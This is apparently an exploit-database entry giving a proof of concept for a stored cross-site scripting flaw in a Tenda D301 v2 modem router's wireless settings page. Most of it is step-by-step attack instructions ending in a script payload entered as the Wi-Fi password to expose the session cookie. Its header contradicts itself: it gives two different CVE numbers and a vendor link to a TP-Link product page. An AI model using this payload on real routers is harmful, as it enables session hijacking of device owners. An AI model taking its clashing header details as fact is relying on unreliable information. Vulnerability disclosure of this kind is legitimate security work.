# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
# Exploit Author: ABDO10
# Date : July, 11th 2019
# Product : Tenda D301 v2 Modem Router
# version : v2
# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
# Tested on: Linux
# CVE : 2019-13491
# Poc Instructions :
/*******************************************************************************************************************/
> 1 - Open modem router on web browser default(192.168.1.1)
> 2 - Click on advanced -> Wireless -> Security
> 3 - fill this payload : <img src="xy" OnError=prompt(document.cookie)> as password
> 4 - Click on "click to display"
/*******************************************************************************************************************/